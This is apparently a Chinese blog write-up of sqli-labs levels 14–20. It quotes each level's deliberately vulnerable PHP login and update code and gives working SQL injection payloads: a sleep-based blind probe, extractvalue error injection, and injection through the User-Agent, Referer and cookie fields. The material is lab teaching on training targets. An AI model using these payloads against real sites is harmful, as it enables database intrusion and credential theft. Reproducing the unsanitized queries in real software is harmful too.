<h3 id="POST-Double-Injection-Single-quotes-String-with-twist-Less-14">POST - Double Injection - Single quotes - String - with twist   Less-14</h3>
<p>这个注入的话其实也就是双引号注入，标题写错了罢了，源码上显示的是双引号的，至于后面的操作，因为关闭了报错和是否正确显示，那么最好的解决方法就是使用时间盲注，经过测试是允许使用时间盲注的，源码如下：</p>
<pre><code class="highlight php"><span class="comment">// connectivity</span>
<span class="variable">$uname</span>=<span class="string">&#x27;&quot;&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&#x27;&quot;&#x27;</span>;
<span class="variable">$passwd</span>=<span class="string">&#x27;&quot;&#x27;</span>.<span class="variable">$passwd</span>.<span class="string">&#x27;&quot;&#x27;</span>; 
<span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username=<span class="subst">$uname</span> and password=<span class="subst">$passwd</span> LIMIT 0,1&quot;</span>;
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);

<span class="keyword">if</span>(<span class="variable">$row</span>)
&#123;
    <span class="comment">//echo &#x27;&lt;font color= &quot;#0000ff&quot;&gt;&#x27;;	</span>

    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot; font size = 4&gt;&#x27;</span>;
    <span class="comment">//echo &quot; You Have successfully logged in &quot; ;</span>
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;3&quot; color=&quot;#0000ff&quot;&gt;&#x27;</span>;	
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="comment">//echo &#x27;Your Login name:&#x27;. $row[&#x27;username&#x27;];</span>
    <span class="comment">//echo &quot;&lt;br&gt;&quot;;</span>
    <span class="comment">//echo &#x27;Your Password:&#x27; .$row[&#x27;password&#x27;];</span>
    <span class="comment">//echo &quot;&lt;br&gt;&quot;;</span>
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/flag.jpg&quot; /&gt;&#x27;</span>;	

    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
&#125;
<span class="keyword">else</span>  
&#123;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size=&quot;3&quot;&gt;&#x27;</span>;
    <span class="comment">//echo &quot;Try again looser&quot;;</span>
    print_r(mysql_error());
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap.jpg&quot;  /&gt;&#x27;</span>;	
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;  
&#125;</code></pre>
<p>从源码可以看出其实还是有改变的，但是因为不知道那个图片是正常的（如果不看源码的情况下），所以采用时间注入</p>
<p>构造的payload如下：</p>
<pre><code class="highlight mysql">admin`&quot;` and sleep(5) -- - #这里需要使用--注释才可以，发现确实延时5秒，所以存在时间盲注</code></pre>
<p>知道存在时间盲注的情况下，可以采用dnslog来获取值，也可以使用常规战术，这个需要看自己吧。后面的操作就不讲了，前面都讲过。本人不喜欢炒剩饭</p>
<h3 id="POST-Bind-Boolean-time-based-Single-quotes-Less-15">POST - Bind - Boolean/time based - Single quotes   Less-15</h3>
<p>这个是一个布尔盲注和时间盲注同时存在的，操作和前面盲注的操作一样就不讲了，也没有啥特别的，对了是单引号闭合</p>
<h3 id="POST-Bind-Boolean-time-based-Double-quotes-Less-16">POST - Bind - Boolean/time based - Double quotes   Less-16</h3>
<p>这是一个双引号加括号闭合的时间/布尔型盲注，前面也讲过，如果前面的认真刷过，这个可以快速过</p>
<h3 id="POST-Update-query-Error-Based-String-Less-17">POST -Update query - Error Based - String   Less-17</h3>
<p>当我们测试账号进行注入时，发现怎么都不成功，因为需要更新密码，有可能会在账号那个位置进行gpc处理，但是密码一般不会，因为密码有的是允许有引号啥的，所以我们可以测试下更新密码</p>
<p><img src="https://s1.imagehub.cc/images/2021/10/04/image9c96b6fee85447a7.png" alt="image9c96b6fee85447a7.png"></p>
<center>【Less-17-1】</center>
<p>不好意思成功了，我们看看是怎么执行的，看源码：</p>
<pre><code class="highlight php"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;uname&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>]))

&#123;
<span class="comment">//making sure uname is not injectable</span>
<span class="variable">$uname</span>=check_input(<span class="variable">$_POST</span>[<span class="string">&#x27;uname&#x27;</span>]);  <span class="comment">#这里对uname进行了处理，使得`&#x27;`无法使用</span>

<span class="variable">$passwd</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>]; <span class="comment">#但是密码没有啊，而且从下面可以看出密码是与数据库进行交互了</span>


<span class="comment">//logging the connection parameters to a file for analysis.</span>
<span class="variable">$fp</span>=fopen(<span class="string">&#x27;result.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>);
fwrite(<span class="variable">$fp</span>,<span class="string">&#x27;User Name:&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&quot;\n&quot;</span>);
fwrite(<span class="variable">$fp</span>,<span class="string">&#x27;New Password:&#x27;</span>.<span class="variable">$passwd</span>.<span class="string">&quot;\n&quot;</span>);
fclose(<span class="variable">$fp</span>);


<span class="comment">// connectivity </span>
@<span class="variable">$sql</span>=<span class="string">&quot;SELECT username, password FROM users WHERE username= <span class="subst">$uname</span> LIMIT 0,1&quot;</span>;

<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);
<span class="comment">//echo $row;</span>
	<span class="keyword">if</span>(<span class="variable">$row</span>)
	&#123;
  		<span class="comment">//echo &#x27;&lt;font color= &quot;#0000ff&quot;&gt;&#x27;;	</span>
		<span class="variable">$row1</span> = <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];  	
		<span class="comment">//echo &#x27;Your Login name:&#x27;. $row1;</span>
		<span class="variable">$update</span>=<span class="string">&quot;UPDATE users SET password = &#x27;<span class="subst">$passwd</span>&#x27; WHERE username=&#x27;<span class="subst">$row1</span>&#x27;&quot;</span>;
        <span class="comment">#更新密码</span>
        <span class="comment">#构造后的$update</span>
        <span class="variable">$update</span>=<span class="string">&quot;UPDATE users SET password = &#x27;admin&#x27; and extractvalue(1,concat(0x7e,(select database()))) and &#x27;1&#x27;=&#x27;1&#x27; WHERE username=&#x27;<span class="subst">$row1</span>&#x27;&quot;</span>;
		mysql_query(<span class="variable">$update</span>);
  		<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
	
	
	
		<span class="keyword">if</span> (mysql_error())
		&#123;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot; font size = 3 &gt;&#x27;</span>;
			print_r(mysql_error());
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&lt;/br&gt;&quot;</span>;
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
		&#125;
		<span class="keyword">else</span>
		&#123;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot; font size = 3 &gt;&#x27;</span>;
			<span class="comment">//echo &quot; You password has been successfully updated &quot; ;		</span>
			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
		&#125;
	
		<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/flag1.jpg&quot;   /&gt;&#x27;</span>;	
		<span class="comment">//echo &#x27;Your Password:&#x27; .$row[&#x27;password&#x27;];</span>
  		<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
	


  	&#125;
	<span class="keyword">else</span>  
	&#123;
		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font size=&quot;4.5&quot; color=&quot;#FFFF00&quot;&gt;&#x27;</span>;
		<span class="comment">//echo &quot;Bug off you Silly Dumb hacker&quot;;</span>
		<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
		<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap1.jpg&quot;   /&gt;&#x27;</span>;
	
		<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;  
	&#125;
&#125;</code></pre>
<p>payload为：</p>
<pre><code class="highlight mysql">admin&#x27; and extractvalue(1,concat(0x7e,(select database()))) and &#x27;1&#x27;=&#x27;1</code></pre>
<p>剩下的基操没啥说的</p>
<h3 id="POST-Header-Injection-Uagent-field-Error-based-Less-18">POST - Header Injection - Uagent field - Error based   Less-18</h3>
<p>这是一个请求头注入，且注入点在user-agent上面，首先查看源码，如下：</p>
<pre><code class="highlight php"><span class="variable">$sql</span>=<span class="string">&quot;SELECT  users.username, users.password FROM users WHERE users.username=<span class="subst">$uname</span> and users.password=<span class="subst">$passwd</span> ORDER BY users.id DESC LIMIT 0,1&quot;</span>;
<span class="variable">$result1</span> = mysql_query(<span class="variable">$sql</span>);
<span class="variable">$row1</span> = mysql_fetch_array(<span class="variable">$result1</span>);
<span class="keyword">if</span>(<span class="variable">$row1</span>)
&#123;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot; font size = 3 &gt;&#x27;</span>;
    <span class="variable">$insert</span>=<span class="string">&quot;INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES (&#x27;<span class="subst">$uagent</span>&#x27;, &#x27;<span class="subst">$IP</span>&#x27;, <span class="subst">$uname</span>)&quot;</span>;<span class="comment">#插入语句，可以对其进行构造</span>
    mysql_query(<span class="variable">$insert</span>);
    <span class="comment">//echo &#x27;Your IP ADDRESS is: &#x27; .$IP;</span>
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
    <span class="comment">//echo &quot;&lt;br&gt;&quot;;</span>
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size = 3 &gt;&#x27;</span>;			
    <span class="keyword">echo</span> <span class="string">&#x27;Your User Agent is: &#x27;</span> .<span class="variable">$uagent</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    print_r(mysql_error());			
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/flag.jpg&quot;  /&gt;&#x27;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;

&#125;
<span class="keyword">else</span>
&#123;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size=&quot;3&quot;&gt;&#x27;</span>;
    <span class="comment">//echo &quot;Try again looser&quot;;</span>
    print_r(mysql_error());
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;			
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap.jpg&quot;   /&gt;&#x27;</span>;	
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;  
&#125;
</code></pre>
<p>由源码可得，用户名是经过gpc的，也就是魔术引号，所以在用户名处构造payload就不现实了，但是下面出现了一个insert语句，为什么使用user-agent，因为他没有进行gpc转义，使用burp抓包结果如下图Less-18-1</p>
<p><img src="https://s1.imagehub.cc/images/2021/10/04/image.png" alt="image.png"></p>
<center>【Less-18-1】</center>
<p>这时我们就可以在user-agent后面进行构造了，payload如下：</p>
<pre><code class="highlight mysql">%27 and extractvalue(1,concat(0x7e,(select database()),0x7e)) and &#x27;1&#x27;=&#x27;1</code></pre>
<p>最终数据库通过报错注入查询出来了，如下图Less-18-2</p>
<p><img src="https://s1.imagehub.cc/images/2021/10/04/image7deb95ab5929eeb7.png" alt="image7deb95ab5929eeb7.png"></p>
<center>【Less-18-2】</center>
<p>这一个测试比较有意思的是需要用户名和密码必须正确，否则就无法进行，其实也挺不错的。</p>
<p>如果我自己注册一个账号，我是不是可以通过登录点提供的注入得到其他用户的密码呢，再一个，很多网站用的并不是第三方安防软件，而是自己写的判断，同时还把信息录入了数据库，再给你提示个请不要非法入侵，你的IP已被记录，这不是自己给自己找洞嘛？</p>
<p>至于接下来的操作就不多说了，还不会自己看前面的教程</p>
<h3 id="POST-Header-Injection-Referer-field-Error-based-Less-19">POST - Header Injection -Referer field - Error based   Less-19</h3>
<p>这个给你们看两张图你们应该就能懂起了，多的我也就懒得说了，有图有真相</p>
<p><img src="https://s1.imagehub.cc/images/2021/10/04/imagebd9aa81c491b096e.png" alt="imagebd9aa81c491b096e.png"><img src="https://s1.imagehub.cc/images/2021/10/04/imaged6f852ee1e1f447b.png" alt="imaged6f852ee1e1f447b.png"></p>
<p>顺便再给你们看哈源码，其实看到这里就已经可以判断应该存在注入了，然后自己再测试一下再所有的header字段后面加相应的测试payload，源码如下：</p>
<pre><code class="highlight php"><span class="variable">$uagent</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_REFERER&#x27;</span>];<span class="comment">#获取的是referer，这下懂了吧</span>
	<span class="variable">$IP</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];
	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
	<span class="keyword">echo</span> <span class="string">&#x27;Your IP ADDRESS is: &#x27;</span> .<span class="variable">$IP</span>;
	<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
	<span class="comment">//echo &#x27;Your User Agent is: &#x27; .$uagent;</span>
<span class="comment">// take the variables</span>
<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;uname&#x27;</span>]) &amp;&amp; <span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>]))

	&#123;
	<span class="variable">$uname</span> = check_input(<span class="variable">$_POST</span>[<span class="string">&#x27;uname&#x27;</span>]);
	<span class="variable">$passwd</span> = check_input(<span class="variable">$_POST</span>[<span class="string">&#x27;passwd&#x27;</span>]);
	
	<span class="comment">/*</span>
<span class="comment">	echo &#x27;Your Your User name:&#x27;. $uname;</span>
<span class="comment">	echo &quot;&lt;br&gt;&quot;;</span>
<span class="comment">	echo &#x27;Your Password:&#x27;. $passwd;</span>
<span class="comment">	echo &quot;&lt;br&gt;&quot;;</span>
<span class="comment">	echo &#x27;Your User Agent String:&#x27;. $uagent;</span>
<span class="comment">	echo &quot;&lt;br&gt;&quot;;</span>
<span class="comment">	echo &#x27;Your User Agent String:&#x27;. $IP;</span>
<span class="comment">	*/</span>

	<span class="comment">//logging the connection parameters to a file for analysis.	</span>
	<span class="variable">$fp</span>=fopen(<span class="string">&#x27;result.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>);
	fwrite(<span class="variable">$fp</span>,<span class="string">&#x27;Referer:&#x27;</span>.<span class="variable">$uname</span>.<span class="string">&quot;\n&quot;</span>);
	
	fclose(<span class="variable">$fp</span>);
	
	
	
	<span class="variable">$sql</span>=<span class="string">&quot;SELECT  users.username, users.password FROM users WHERE users.username=<span class="subst">$uname</span> and users.password=<span class="subst">$passwd</span> ORDER BY users.id DESC LIMIT 0,1&quot;</span>;
	<span class="variable">$result1</span> = mysql_query(<span class="variable">$sql</span>);
	<span class="variable">$row1</span> = mysql_fetch_array(<span class="variable">$result1</span>);
		<span class="keyword">if</span>(<span class="variable">$row1</span>)
			&#123;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot; font size = 3 &gt;&#x27;</span>;
			<span class="variable">$insert</span>=<span class="string">&quot;INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES (&#x27;<span class="subst">$uagent</span>&#x27;, &#x27;<span class="subst">$IP</span>&#x27;)&quot;</span>; <span class="comment">#还是那个熟悉的insert语句</span>
			mysql_query(<span class="variable">$insert</span>);
			<span class="comment">//echo &#x27;Your IP ADDRESS is: &#x27; .$IP;</span>
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
			<span class="comment">//echo &quot;&lt;br&gt;&quot;;</span>
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size = 3 &gt;&#x27;</span>;			
			<span class="keyword">echo</span> <span class="string">&#x27;Your Referer is: &#x27;</span> .<span class="variable">$uagent</span>;
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;
			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
			print_r(mysql_error());			
			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;br&gt;&quot;</span>;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/flag.jpg&quot; /&gt;&#x27;</span>;
			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
			
			&#125;
		<span class="keyword">else</span>
			&#123;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#0000ff&quot; font size=&quot;3&quot;&gt;&#x27;</span>;
			<span class="comment">//echo &quot;Try again looser&quot;;</span>
			print_r(mysql_error());
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;			
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/br&gt;&quot;</span>;
			<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap.jpg&quot;  /&gt;&#x27;</span>;	
			<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;  
			&#125;

	&#125;</code></pre>
<h3 id="POST-Cookie-Injection-Uagent-field-Error-based-Less-20">POST - Cookie Injection - Uagent field - Error based   Less-20</h3>
<p>这是一个cookie注入，在登录成功后，一般后端会返回一个cookie给前端，以后页面刷新或者其他操作只需要查询cookie中特殊的值，就可以得到结果，这也就给注入创造了机会，而且这个还不会受gpc影响，重要源码如下：</p>
<pre><code class="highlight php"><span class="variable">$cookee</span> = <span class="variable">$_COOKIE</span>[<span class="string">&#x27;uname&#x27;</span>]; <span class="comment">#具体的值看下图Less-20-1</span>
<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM users WHERE username=&#x27;<span class="subst">$cookee</span>&#x27; LIMIT 0,1&quot;</span>;
<span class="variable">$result</span>=mysql_query(<span class="variable">$sql</span>);
<span class="keyword">if</span> (!<span class="variable">$result</span>)
&#123;
    <span class="keyword">die</span>(<span class="string">&#x27;Issue with your mysql: &#x27;</span> . mysql_error());
&#125;
<span class="variable">$row</span> = mysql_fetch_array(<span class="variable">$result</span>);
<span class="keyword">if</span>(<span class="variable">$row</span>)
&#123;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;pink&quot; font size=&quot;5&quot;&gt;&#x27;</span>;	
    <span class="keyword">echo</span> <span class="string">&#x27;Your Login name:&#x27;</span>. <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;grey&quot; font size=&quot;5&quot;&gt;&#x27;</span>;  	
    <span class="keyword">echo</span> <span class="string">&#x27;Your Password:&#x27;</span> .<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>];
    <span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&lt;/b&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;Your ID:&#x27;</span> .<span class="variable">$row</span>[<span class="string">&#x27;id&#x27;</span>];
&#125;
<span class="keyword">else</span>	
&#123;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;center&gt;&quot;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;br&gt;&lt;br&gt;&lt;br&gt;&#x27;</span>;
    <span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap1.jpg&quot; /&gt;&#x27;</span>;
    <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;br&gt;&lt;b&gt;&quot;</span>;
    <span class="comment">//echo &#x27;&lt;img src=&quot;../images/Less-20.jpg&quot; /&gt;&#x27;;</span>
&#125;</code></pre>
<p><img src="https://s1.imagehub.cc/images/2021/10/04/imageca23bdb3b32f5d81.png" alt="imageca23bdb3b32f5d81.png"></p>
<center>【Less-20-1】</center>
<p>构造payload就不说了，和less-19一致，至于后面的操作就没啥用了，一般cookie比user-agent用的多以点，至于会出现在哪种情况，前面已经说的很明白了，就不需要再说了</p>

</div>


    <div class="post-guide">
        <div class="item left">
            
              <a href="/ZeroP/2021/10/02/%E9%9D%B6%E5%9C%BA%E9%80%9A%E5%85%B3/fileupload-labs/">
                  <i class="fa fa-angle-left" aria-hidden="true"></i>
                  fileupload-labs
              </a>
            
        </div>
        <div class="item right">
            
              <a href="/ZeroP/2021/09/17/WEB%E5%AE%89%E5%85%A8/%E6%B3%A8%E5%85%A5%E6%94%BB%E5%87%BB/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5/">
                注入攻击
                <i class="fa fa-angle-right" aria-hidden="true"></i>
              </a>
            
        </div>
    </div>



	<div id="vcomments"></div>


<script>
	
		// 评论
		new Valine({
			av: AV,
			el: '#vcomments',
			notify: false,
			verify: false,
			path: window.location.pathname,
			appId: '',
			appKey: '',
			placeholder: '请输入评论',
			avatar: 'retro',
			recordIP: false
		})
	
	
</script>
	</div>
	<div id="footer">
	<p>
	©2021-<span id="footerYear"></span> 
	<a href="/">ZeroP零点</a> 
	
	
		|
		<span id="busuanzi_container_site_pv">
			pv
			<span id="busuanzi_value_site_pv"></span>
		</span>
		|
		<span id="busuanzi_container_site_uv"> 
			uv
			<span id="busuanzi_value_site_uv"></span>
		</span>
	
	<br>
	Theme <a href="//github.com/wujun234/hexo-theme-tree" target="_blank">Tree</a>
	by <a href="//github.com/wujun234" target="_blank">WuJun</a>
	Powered by <a href="//hexo.io" target="_blank">Hexo</a>
	</p>
</div>
<script type="text/javascript"> 
	document.getElementById('footerYear').innerHTML = new Date().getFullYear() + '';
</script>
	<button id="totop-toggle" class="toggle"><i class="fa fa-angle-double-up" aria-hidden="true"></i></button>
</body>
</html>